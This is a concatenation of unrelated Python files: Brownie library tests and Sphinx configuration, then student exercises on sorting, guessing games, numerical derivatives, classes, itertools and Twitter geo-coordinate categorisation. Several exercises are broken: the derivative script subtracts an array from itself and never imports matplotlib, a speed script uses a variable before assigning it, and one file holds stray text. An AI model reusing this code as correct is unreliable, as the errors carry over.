Assert(repr(progressbar)) == 'ProgressBar([], %r, maxsteps=100)' % writer
tests.register(TestProgressBar)
########NEW FILE########
__FILENAME__ = text
# coding: utf-8
"""
brownie.tests.text
~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.tests`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
try:
import translitcodec
except ImportError:
translitcodec = None
from attest import Tests, Assert
from brownie.text import transliterate
tests = Tests()
@tests.test
def test_transliterate():
Assert(transliterate(u'äöü', 'one')) == u'aou'
tests = zip(
[
(u'©', 'long'),
(u'©', 'short'),
(u'☺', 'one'),
],
[u''] * 3 if translitcodec is None else [u'(c)', u'c', u'?']
)
for args, result in tests:
Assert(transliterate(*args)) == result
########NEW FILE########
__FILENAME__ = text
# coding: utf-8
"""
brownie.text
~~~~~~~~~~~~
Utilities to deal with text.
.. versionadded:: 0.6
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import unicodedata
try:
import translitcodec
except ImportError: # pragma: no cover
translitcodec = None
def transliterate(string, length='long'):
"""
Returns a transliterated version of the given unicode `string`.
By specifying `length` you can specify how many characters are used for a
replacement:
`long`
Use as many characters as needed to make a natural replacement.
`short`
Use as few characters as possible to make a replacement.
`one`
Use only one character to make a replacement. If a character cannot
be transliterated with a single character replace it with `'?'`.
If available translitcodec_ is used, which provides more natural results.
.. _translitcodec: http://pypi.python.org/pypi/translitcodec
"""
if length not in ('long', 'short', 'one'):
raise ValueError('unknown length: %r' % length)
if translitcodec is None:
return unicodedata.normalize('NFKD', string) \
.encode('ascii', 'ignore') \
.decode('ascii')
else:
if length == 'one':
return string.encode('translit/one/ascii', 'replace').decode('ascii')
return string.encode('translit/%s' % length)
########NEW FILE########
__FILENAME__ = conf
# -*- coding: utf-8 -*-
#
# Brownie documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 3 16:39:44 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.path.pardir))
sys.path.append(os.path.abspath('_themes/minimalism'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc', 'sphinx.ext.intersphinx', 'sphinx.ext.viewcode',
'sphinx.ext.doctest', 'sphinxcontrib.ansi'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Brownie'
copyright = u'2010-2011, Daniel Neuhäuser and others'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.5+'
# The full version, including alpha/beta/rc tags.
release = '0.5+'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
# pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
if os.path.exists('_themes/minimalism'):
html_theme = 'minimalism'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
'github_fork': 'DasIch/Brownie',
'is_a_pocoo_project': True
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Browniedoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Brownie.tex', u'Brownie Documentation',
u'Daniel Neuhäuser', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'brownie', u'Brownie Documentation',
[u'Daniel Neuhäuser'], 1)
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'http://docs.python.org/': None,
'http://www.pocoo.org/': None
}
autodoc_member_order = 'bysource'
html_ansi_stylesheet = 'black-on-white.css'
########NEW FILE########
__FILENAME__ = runtests
# coding: utf-8
import sys
from attest import FancyReporter
from brownie.importing import import_string
def main(tests=sys.argv[1:]):
prefix = 'brownie.tests.'
if not tests:
import_string(prefix + 'all').run(
reporter=FancyReporter(style='native')
)
for tests in (import_string(prefix + test + '.tests') for test in tests):
tests.run(reporter=FancyReporter(style='native'))
if __name__ == '__main__':
main()
########NEW FILE########
|
527ddb97e47c0a45684303f32ab957bad865992e | gabriellaec/desoft-analise-exercicios | /backup/user_087/ch28_2019_03_30_23_28_42_136365.py | 182 | 3.875 | 4 | if v <= 80:
print ('Não foi multado')
else:
valor = 0.5*(v - 80)
print ('Foi multado no valor de {0:.2f}'.format(valor))
v = float(input('Qual a velocidade do carro?')) |
f85f44386a40ef37e649a7a325cccd999ceeb899 | CfSanchezog/ExamenFinal_Metodos | /ejercicio1.py | 641 | 3.671875 | 4 | # Ejercicio1
# A partir de los arrays x y fx calcule la segunda derivada de fx con respecto a x.
# Esto lo debe hacer sin usar ciclos 'for' ni 'while'.
# Guarde esta segunda derivada en funcion de x en una grafica llamada 'segunda.png'
import numpy as np
x = np.linspace(0,2.,10)
fx = np.array([0., 0.0494, 0.1975, 0.4444, 0.7901,1.2346 , 1.7778, 2.4198, 3.1605, 4.])
#Calcula derivadas
derivada1=[]
derivada2=[]
h=2.0/10 #Porque x va de 0 a 2 y tiene 10 puntos
derivada1.append((fx[:-1]-fx[:-1])/h)
derivada2.append((derivada1[:-2]-derivada1[:-1])/h)
#Grafica la funcion
plt.figure()
plt.plot(x,derivada2)
plt.savefig('segunda.png')
|
96bd3655f408032dbc2b5aeb965ba1d8bda9dd81 | dani1563/practica_11 | /ejercicio5.py | 1,089 | 4.1875 | 4 | #Estrategia incremental
#Algoritmo de ordenacion por inserción
"""
21 10 12 0 34 15 numeros a ordenar
Parte ordenada
Partimos de la idea de que ya está ordenado el primero
21 10 12 34 15 10<21 SI
10 21 12 0 33 15 12<10 NO 12<21 SI
10 12 21 0 34 15
0 10 12 21 34 15
0 10 12 21 34 15
0 10 12 15 21 34
"""
def inserSort(lista):
for index in range(1, len(lista)): #(n-1)
actual = lista[index]
posicion = index
#print("Valor a ordenar {}".format(actual))
while posicion>0 and lista[posicion-1]>actual: #(n^2)
lista[posicion] = lista[posicion-1]
posicion = posicion-1
lista[posicion] = actual
#print(lista)
#print()
return lista
lista= [21,10,12,0,34,15]
#print(lista)
#inserSort(lista)
#print(lista)
"""
ordenamiento por fuerza bruta, burbuja
divide y venceras, merge
quicksort- divide el problema en dos, aprte los datos y mueve los que se encuentran
en la posicion incorrecta respecto al pibote
""" |
924a26bfaa2bcd862503b3027134c76477fb6d7c | poc7667/internal-training-python-course | /01/pre_hw_01.py | 355 | 3.859375 | 4 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
name=raw_input("Please enter your name:")
print("Hi "+ name)
print("Welcome to play the guess number game...")
if name.lower()=="eric":
print "Hi" + name + ", how are you ?"
else:
print "Who are you ? get out!"
while True:
print("Hi "+ name + ", are you ready ?")
time.sleep(0.5) |
d5d74327f0a7a6c26dd5a01308761c9b994e9eb2 | Yunyun1101/guess | /guess.py | 720 | 3.671875 | 4 | # 產生一個隨機整數1~100 (不要印出來)
# 讓使用者重複輸入數字去猜
# 猜對的話 印出 “終於猜對了!”
# 猜錯的話 要告訴他 比答案大/小
import random
start = input('請決定隨機數字範圍開始值:')
end = input('請決定隨機數字範圍結束值:')
start = int(start)
end = int(end)
answer = random.randint(start, end)
count = 0
while True :
guess = input ('請猜數字:')
guess = int(guess)
count += 1 # count = count + 1
if guess > answer :
print('比答案大')
elif guess < answer :
print('比答案小')
else :
print('終於猜對了!')
print('這是你猜的第', count, '次')
break
print('這是你猜的第', count, '次')
|
242ea2dad1319a69f40ec0f0466f2ff488ae90ca | OneDay8/test | /class_learn.py | 1,428 | 4.03125 | 4 | class Person:
def __init__(self,x):
self.x = x
self.name = 'William'
self.age = 45
self.wight = 90
def greet(self):
print('hi,my name is ' + self.name)
class Animal(Person):
def __init__(self,x):
super(Animal, self).__init__(x)
self.name = 'cat'
def greet(self,Person):
print(self.name + ' is belong to ' + Person.name )
#creat a object
p1 = Person(1)
a1 = Animal(123)
#call the method
a1.greet(p1)
class Fib():
def __init__(self):
self.a,self.b = 0,1
def __iter__(self):
return self
def __next__(self):
self.a,self.b = self.b,self.a+self.b
return self.a
'''
fib = Fib()
for i in fib:
if i > 10:
break
print(i)
'''
class People(object):
def __init__(self,name,age,gender, money):
self.name = name
self.age = age
self.gender = gender
self.__money = money
def __play(self): ##双下划线表示类内部使用
print("王者荣耀正在进行时")
self.newname = '111'
return self.newname
def play(self):
self.newname1 = self.__play()
return self.newname1
'''
p1 = People('user1', 10, 'male', 1000000)
p1.play()
'''
lalalalal
111
|
a0caac5caad2ce9f84d26d8a233d4f042951c2ab | anorld-droid/Email-Sender | /Search/linear_search.py | 321 | 3.8125 | 4 | #!/usr/bin/env python
def search(list, key):
"""If the key is in the list return the position, -1 otherwise"""
for i, word in enumerate(list):
if word == key:
return i
return -1
def main():
number = [i for i in range(45, 100)]
position = search(number, 56)
print(position)
|
a67fc8274d502746032005b93c36918d1e185c0b | elsenorbw/advent-of-code-2020 | /day13/investigation2.py | 1,404 | 3.671875 | 4 | #
# trying to improve the logic for combining a pair of (inc,off)'s
#
# this is the maive version to beat..
# and as I type, the answer has arrived..
# so that method worked ok..
# but we could probably do better
def combine_pairs(inc_off_one, inc_off_two):
print(f"Combining [{inc_off_one}] with [{inc_off_two}]")
a = IncOff(*inc_off_one)
b = IncOff(*inc_off_two)
print(f"{a} --- {b}")
# ok, step one is to find the first intersection
while a.value() != b.value():
# increment the smaller one..
if a.value() < b.value():
a.next()
else:
b.next()
print(f"{a} --- {b}")
# ok, cool, we have the starting value..
start_value = a.value()
# now find the next time they meet
a.next()
b.next()
while a.value() != b.value():
# increment the smaller one..
if a.value() < b.value():
a.fast_increment(b.value())
else:
b.fast_increment(a.value())
print(f"{a} --- {b}")
next_value = a.value()
# so now we know the increment as well..
increment = next_value - start_value
print(f"increment is {increment}")
# the offset then is..
offset = increment - start_value
print(f"offset is {offset}")
# and we're done..
return (increment, offset)
new_pair = combine_pairs((7, 0), (9, 2))
print(f"new pair is: {new_pair}")
|
22804d0927de106504b76a32784109e415a4a82f | uoshvis/python-examples | /itertools/swimmers.py | 2,756 | 3.640625 | 4 | from collections import namedtuple
import csv
import datetime
import itertools as it
import statistics
class Event(namedtuple('Event', ['stroke', 'name', 'time'])):
__slots__ = ()
# for min()
def __lt__(self, other):
return self.time < other.time
def sort_and_group(iterable, key=None):
"""Group sorted `iterable` on `key`."""
return it.groupby(sorted(iterable, key=key), key=key)
def grouper(iterable, n, fillvalue=None):
iters = [iter(iterable)] * n
return it.zip_longest(*iters, fillvalue=fillvalue)
def read_events(csvfile, _strptime=datetime.datetime.strptime):
def _median(times):
return statistics.median((_strptime(time, '%M:%S:%f').time()
for time in row['Times']))
fieldnames = ['Event', 'Name', 'Stroke']
with open(csvfile) as infile:
# reads each row in the swimmers.csv file into an OrderedDict object
# By assigning the 'Times' field to restkey,
# the “Time1”, “Time2”, and “Time3” columns of each row in the CSV file will be stored
# in a list on the 'Times' key
reader = csv.DictReader(infile, fieldnames=fieldnames, restkey='Times')
next(reader) # Skip header.
for row in reader:
yield Event(row['Stroke'], row['Name'], _median(row['Times']))
def main():
# a tuple of Event objects is created
events = tuple(read_events('swimmers.csv'))
# create a for loop that iterates over the data in the events tuple grouped by stroke
for stroke, evts in sort_and_group(events, key=lambda evt: evt.stroke):
# group the evts iterator by swimmer name
events_by_name = sort_and_group(evts, key=lambda evt: evt.name)
# calculate the best time for each swimmer in events_by_name
best_times = (min(evt) for _, evt in events_by_name)
# sort best_times by time and aggregate the result into groups of four
sorted_by_time = sorted(best_times, key=lambda evt: evt.time)
# use the grouper() function use islice() to grab the first two groups.
teams = zip(('A', 'B'), it.islice(grouper(sorted_by_time, 4), 2))
# teams is an iterator over exactly two tuples representing the “A” and the “B” team for the stroke.
# The first component of each tuple is the letter “A” or “B”,
# and the second component is an iterator over Event objects containing the swimmers in the team
for team, swimmers in teams:
print('{stroke} {team}: {names}'.format(
stroke=stroke.capitalize(),
team=team,
names=', '.join(swimmer.name for swimmer in swimmers)
))
if __name__ == '__main__':
main()
|
ab56f59132126cdd6bdd709f62d08bea0b0e64c4 | camilleanne/hackbright_archive | /exercise01/guess.py | 856 | 3.890625 | 4 | import random
def guessing_game():
print "Hey there, guessypants! What's your name?"
name = raw_input()
print "Hi %s. I'm thinking of a number between 1 and 100. Try to guess the number." % name
prompt = 'Your guess? '
guess = 0
number = random.randint(1, 100)
while guess != number:
try:
guess = int(raw_input(prompt))
if guess < number:
print "Your guess is too low."
#guess = int(raw_input(prompt))
if guess > number:
print "Your guess is too high."
#guess = int(raw_input(prompt))
if guess == number:
print "Congratulations, you're right %s!" % name
except ValueError:
print "Try again, with a whole number!"
guessing_game() |
65c7bdd203f9f944a3d5b6a547d07f1fea7a7fbd | Samuel1P/Prep | /small_problems/fuzzbizz.py | 438 | 4.34375 | 4 | #if int is divisible by both 3 and 5, then print fizzbuzz
#if int is divisible by only 5, then print buzz
#if int is divisible by only 3, then print fizz
# if int is not divisible by both print the int
for fizzbuzz in range(50):
if fizzbuzz % 3 == 0 and fizzbuzz % 5 == 0:
print("fizzbuzz")
elif fizzbuzz % 3 == 0:
print("fizz")
elif fizzbuzz % 5 == 0:
print("buzz")
else:
print(fizzbuzz)
|
2cc102bb664d783a739c7527af9e7d35feb11e04 | tawseefpatel/ECOR1051 | /python/assignments/Lab 10/Lab10ex2.py | 260 | 4.09375 | 4 | def divisors(n:int)->list:
"""returns a list containing all the positive divisors of n.
>>> divsors(6)
>>>[1,2,3,6]
>>>divisors(9)
>>>[1,3,9]
"""
i = 1
return [i for i in range (1,n+1) if n%i == 0]
print(divisors(6)) |
b2fb4b21d97787a5cbc70bcb56cca7a805f7075e | rishikeshd/Geo-Spatial-Analysis-using-Python | /Categorize.py | 13,163 | 3.59375 | 4 | ##############################################################
#Script is used to extract data from csv files and perform operations like
#Cleaning geo coordinates to lat, long
#Cleaning created_at to only time at which the user tweeted
#Convert coordinate system data in array from DD to DMS(Degree Minutes Seconds)
#Dividing lat,long into different squares of a geo-located matrix for city DC
#Categorizing time to different time categories like Morning, Evening and Night
import logging
import os, sys
import csv
import collections
import re
import string
import time
def ReadFromCsv():
####Used to read csv data into different arrays
with open('all_use.csv', 'rU') as f:
reader = csv.reader(f)
csv.register_dialect('pipes', delimiter=',')
reader.next()
for line in reader:
arr_id.append(line[0])
arr_cr.append(line[1])
arr_geo.append(line[2])
print len(arr_id)
print len(arr_cr)
print len(arr_geo)
return arr_id,arr_cr,arr_geo
def CleanCrGeo(arr_id,arr_cr,arr_geo):
#Cleans created_at and geo coordinates
for item,i in enumerate(arr_id):
word=arr_cr[item]
a,b,c,d,e,f=word.split(" ")
arr_cr2.append(d)
world=arr_geo[item]
m,n=world.split(",")
m=m.replace('[','')
n=n.replace(']','')
arr_lat.append(m)
arr_long.append(n)
#print len(arr_lat)
return arr_cr2,arr_lat,arr_long
def DDToDMS(arr_id,arr_lat,arr_long):
#converts coordinates of geo from DD to DMS(Degree Minutes Seconds)
for i in arr_lat:
i=float(i)
mnt,sec = divmod(i*3600,60)
deg,mnt = divmod(mnt,60)
#print deg,mnt,sec
dms_lat=str(int(deg))+"."+str(int(mnt))+str(int(round(float(sec))))
arr_lat2.append(dms_lat)
continue
for j in arr_long:
j=float(j)
mnt,sec = divmod(j*3600,60)
deg,mnt = divmod(mnt,60)
#print deg,mnt,sec
dms_long=str(int(deg))+"."+str(int(mnt))+str(int(round(float(sec))))
arr_long2.append(dms_long)
continue
#print len(arr_lat2)
#print len(arr_long2)
return arr_lat2,arr_long2
def DivideTimeToCategory(arr_id,arr_cr2):
#Categorizing time to different time categories like Morning, Evening and Night
for i in arr_cr2:
#print i
h,m,s=i.split(":")
h=int(h)
if int(h)>=5 and int(h)<=11:
arr_timecat.append("Morning")
elif int(h)>=12 and int(h)<=17:
arr_timecat.append("Evening")
elif (int(h)>=18 and int(h)<=23) or (int(h)>=0 and int(h)<=4):
arr_timecat.append("Night")
continue
return arr_timecat
def DivideLatLongIntoCategory(arr_id,arr_lat2,arr_long2):
#dividing lat,long into 64 squares of a geolocated matrix for city DC
for item,i in enumerate(arr_id):
#print arr_long[item]
latit=float(arr_lat2[item])
longit=float(arr_long2[item])
longit=longit*(-1)
if latit>=38.5750 and latit<=38.5900 and longit<=77.10 and longit>=77.08:
arr_cat.append("1")
elif latit>=38.5750 and latit<=38.5900 and longit<=77.08 and longit>=77.06:
arr_cat.append("2")
elif latit>=38.5750 and latit<=38.5900 and longit<=77.06 and longit>=77.04:
arr_cat.append("3")
elif latit>=38.5750 and latit<=38.5900 and longit<=77.04 and longit>=77.02:
arr_cat.append("4")
elif latit>=38.5750 and latit<=38.5900 and longit<=77.02 and longit>=77.00:
arr_cat.append("5")
elif latit>=38.5750 and latit<=38.5900 and longit<=77.00 and longit>=76.58:
arr_cat.append("6")
elif latit>=38.5750 and latit<=38.5900 and longit<=76.58 and longit>=76.56:
arr_cat.append("7")
elif latit>=38.5750 and latit<=38.5900 and longit<=76.56 and longit>=76.54:
arr_cat.append("8")
elif latit>=38.5600 and latit<=38.5750 and longit<=77.10 and longit>=77.08:
arr_cat.append("9")
elif latit>=38.5600 and latit<=38.5750 and longit<=77.08 and longit>=77.06:
arr_cat.append("10")
elif latit>=38.5600 and latit<=38.5750 and longit<=77.06 and longit>=77.04:
arr_cat.append("11")
elif latit>=38.5600 and latit<=38.5750 and longit<=77.04 and longit>=77.02:
arr_cat.append("12")
elif latit>=38.5600 and latit<=38.5750 and longit<=77.02 and longit>=77.00:
arr_cat.append("13")
elif latit>=38.5600 and latit<=38.5750 and longit<=77.00 and longit>=76.58:
arr_cat.append("14")
elif latit>=38.5600 and latit<=38.5750 and longit<=76.58 and longit>=76.56:
arr_cat.append("15")
elif latit>=38.5600 and latit<=38.5750 and longit<=76.56 and longit>=77.54:
arr_cat.append("16")
elif latit>=38.5450 and latit<=38.5600 and longit<=77.10 and longit>=77.08:
arr_cat.append("17")
elif latit>=38.5450 and latit<=38.5600 and longit<=77.08 and longit>=77.06:
arr_cat.append("18")
elif latit>=38.5450 and latit<=38.5600 and longit<=77.06 and longit>=77.04:
arr_cat.append("19")
elif latit>=38.5450 and latit<=38.5600 and longit<=77.04 and longit>=77.02:
arr_cat.append("20")
elif latit>=38.5450 and latit<=38.5600 and longit<=77.02 and longit>=77.00:
arr_cat.append("21")
elif latit>=38.5450 and latit<=38.5600 and longit<=77.00 and longit>=76.58:
arr_cat.append("22")
elif latit>=38.5450 and latit<=38.5600 and longit<=76.58 and longit>=76.56:
arr_cat.append("23")
elif latit>=38.5450 and latit<=38.5600 and longit<=76.56 and longit>=76.54:
arr_cat.append("24")
elif latit>=38.5300 and latit<=38.5450 and longit<=77.10 and longit>=77.08:
arr_cat.append("25")
elif latit>=38.5300 and latit<=38.5450 and longit<=77.08 and longit>=77.06:
arr_cat.append("26")
elif latit>=38.5300 and latit<=38.5450 and longit<=77.06 and longit>=77.04:
arr_cat.append("27")
elif latit>=38.5300 and latit<=38.5450 and longit<=77.04 and longit>=77.02:
arr_cat.append("28")
elif latit>=38.5300 and latit<=38.5450 and longit<=77.02 and longit>=77.00:
arr_cat.append("29")
elif latit>=38.5300 and latit<=38.5450 and longit<=77.00 and longit>=76.58:
arr_cat.append("30")
elif latit>=38.5300 and latit<=38.5450 and longit<=76.58 and longit>=76.56:
arr_cat.append("31")
elif latit>=38.5300 and latit<=38.5450 and longit<=76.56 and longit>=76.54:
arr_cat.append("32")
elif latit>=38.5150 and latit<=38.5300 and longit<=77.10 and longit>=77.08:
arr_cat.append("33")
elif latit>=38.5150 and latit<=38.5300 and longit<=77.08 and longit>=77.06:
arr_cat.append("34")
elif latit>=38.5150 and latit<=38.5300 and longit<=77.06 and longit>=77.04:
arr_cat.append("35")
elif latit>=38.5150 and latit<=38.5300 and longit<=77.04 and longit>=77.02:
arr_cat.append("36")
elif latit>=38.5150 and latit<=38.5300 and longit<=77.02 and longit>=77.00:
arr_cat.append("37")
elif latit>=38.5150 and latit<=38.5300 and longit<=77.00 and longit>=76.58:
arr_cat.append("38")
elif latit>=38.5150 and latit<=38.5300 and longit<=76.58 and longit>=76.56:
arr_cat.append("39")
elif latit>=38.5150 and latit<=38.5300 and longit<=76.56 and longit>=76.54:
arr_cat.append("40")
elif latit>=38.5000 and latit<=38.5150 and longit<=77.10 and longit>=77.08:
arr_cat.append("41")
elif latit>=38.5000 and latit<=38.5150 and longit<=77.08 and longit>=77.06:
arr_cat.append("42")
elif latit>=38.5000 and latit<=38.5150 and longit<=77.06 and longit>=77.04:
arr_cat.append("43")
elif latit>=38.5000 and latit<=38.5150 and longit<=77.04 and longit>=77.02:
arr_cat.append("44")
elif latit>=38.5000 and latit<=38.5150 and longit<=77.02 and longit>=77.00:
arr_cat.append("45")
elif latit>=38.5000 and latit<=38.5150 and longit<=77.00 and longit>=76.58:
arr_cat.append("46")
elif latit>=38.5000 and latit<=38.5150 and longit<=76.58 and longit>=76.56:
arr_cat.append("47")
elif latit>=38.5000 and latit<=38.5150 and longit<=76.56 and longit>=76.54:
arr_cat.append("48")
elif latit>=38.4850 and latit<=38.5000 and longit<=77.10 and longit>=77.08:
arr_cat.append("49")
elif latit>=38.4850 and latit<=38.5000 and longit<=77.08 and longit>=77.06:
arr_cat.append("50")
elif latit>=38.4850 and latit<=38.5000 and longit<=77.06 and longit>=77.04:
arr_cat.append("51")
elif latit>=38.4850 and latit<=38.5000 and longit<=77.04 and longit>=77.02:
arr_cat.append("52")
elif latit>=38.4850 and latit<=38.5000 and longit<=77.02 and longit>=77.00:
arr_cat.append("53")
elif latit>=38.4850 and latit<=38.5000 and longit<=77.00 and longit>=76.58:
arr_cat.append("54")
elif latit>=38.4850 and latit<=38.5000 and longit<=76.58 and longit>=76.56:
arr_cat.append("55")
elif latit>=38.4850 and latit<=38.5000 and longit<=76.56 and longit>=76.54:
arr_cat.append("56")
elif latit>=38.4700 and latit<=38.4850 and longit<=77.10 and longit>=77.08:
arr_cat.append("57")
elif latit>=38.4700 and latit<=38.4850 and longit<=77.08 and longit>=77.06:
arr_cat.append("58")
elif latit>=38.4700 and latit<=38.4850 and longit<=77.06 and longit>=77.04:
arr_cat.append("59")
elif latit>=38.4700 and latit<=38.4850 and longit<=77.04 and longit>=77.02:
arr_cat.append("60")
elif latit>=38.4700 and latit<=38.4850 and longit<=77.02 and longit>=77.00:
arr_cat.append("61")
elif latit>=38.4700 and latit<=38.4850 and longit<=77.00 and longit>=76.58:
arr_cat.append("62")
elif latit>=38.4700 and latit<=38.4850 and longit<=76.58 and longit>=76.56:
arr_cat.append("63")
elif latit>=38.4700 and latit<=38.4850 and longit<=76.56 and longit>=76.54:
arr_cat.append("64")
else:
arr_cat.append("0")
return arr_cat
def ExtractUniqueId(arr_id,arr_cr2,arr_lat,arr_long,arr_lat2,arr_long2,arr_timecat,arr_cat):
#Extracting the unique ids from a large array of twitter and putting them into a dictionary
my_dict={}
for (ind,elem) in enumerate(arr_id):
if elem in my_dict:
my_dict[elem].append(ind)
else:
my_dict.update({elem:[ind]})
for key,value in my_dict.iteritems():
#print "key(%s) has indices (%s)" %(key,value)
for j in value:
dict1[str(key)].append([arr_cr2[j],arr_lat[j],arr_long[j],arr_lat2[j],arr_long2[j],arr_timecat[j],arr_cat[j]])
continue
continue
#print len(dict1)
return dict1
def WriteIntoCsv(dict1):
#Writing dictionary to csv file
i=1
print len(dict1.keys())
for key,value in dict1.iteritems():
#print value
filename="file"+str(i)+".csv"
with open(str(filename), 'wb') as fin:
fieldnames = ['id', 'created','lat','long', 'lat2' , 'long2','timecat','cat']
writer = csv.DictWriter(fin, fieldnames=fieldnames)
writer.writeheader()
for k in range(1,len(value)):
writer.writerow({'id': key , 'created': value[k][0] , 'lat' : value[k][1] , 'long' : value[k][2] , 'lat2' : value[k][3] , 'long2' : value[k][4],'timecat' : value[k][5], 'cat' : value[k][6]})
fin.close()
i=i+1
if i>328:
break
continue
def main():
try:
global arr_id,arr_cr,arr_geo,dict2,arr_filename,dict1,arr_cr2,arr_lat,arr_long,arr_lat2,arr_long2,arr_timecat,arr_cat
dict1=collections.defaultdict(list)
arr_id=[]
arr_cr=[]
arr_cr2=[]
arr_timecat=[]
arr_geo=[]
arr_lat=[]
arr_long=[]
arr_lat2=[]
arr_long2=[]
arr_filename=[]
arr_cat=[]
dict2={}
logging.basicConfig(filename='LOG_total.log', level=logging.DEBUG )
arr_id,arr_cr,arr_geo=ReadFromCsv()
arr_cr2,arr_lat,arr_long=CleanCrGeo(arr_id,arr_cr,arr_geo)
arr_lat2,arr_long2=DDToDMS(arr_id,arr_lat,arr_long)
arr_timecat=DivideTimeToCategory(arr_id,arr_cr2)
arr_cat=DivideLatLongIntoCategory(arr_id,arr_lat2,arr_long2)
dict1=ExtractUniqueId(arr_id,arr_cr2,arr_lat,arr_long,arr_lat2,arr_long2,arr_timecat,arr_cat)
WriteIntoCsv(dict1)
logging.info(arr_cat)
except Exception,e:
logging.error('An error has ocurred with description %s' ,e)
sys.exit(1)
print "end"
if __name__=="__main__":
main()
|
d372563bf7ce5ab6d1d01e7f236f9d04af42bfe5 | Victorvv72/TPA-Lista | /quest 3.py | 263 | 3.78125 | 4 | nascido = 0
contador = 1
total = 0
while contador <= 10:
contador += 1
nascido = int(input('Em que ano você nasceu: '))
demaior = (nascido - 2021) *-1
if demaior >= 18:
total += 1
print ('{} São maiores de idade'.format (total)) |
eaeb8e0d0cde6f428b171adb48b6859daf33c21b | p4radoks/yeni | /07SortveTuples.py | 568 | 3.5625 | 4 | sayi1=[8,56,25,875,224,156,1561,2441,12]
sayi1.sort() #Sort fonksiynu sayi1 dizisinin sayıların büyüklüğüne göre sıralanmasını sağlar
print(sayi1)
print(sorted("ahmet")) #ahmet'in karakterlerini alfabetik sıraya göre sıralar
isim1=["ahmet","mehmet","ali"]
isim1.sort() #İsimlerdeki karakterlerin alfabedeki yerlerinin toplamını alarak azdan çoğa doğru sıralar
print(isim1)
isim2=("selim","cafer","cengiz")
print(isim2)
# isim2.reverse() #isim2 bir tuples olduğu için bunu içerisinde herhangi bir değişiklik YAPILAMAZ!
|
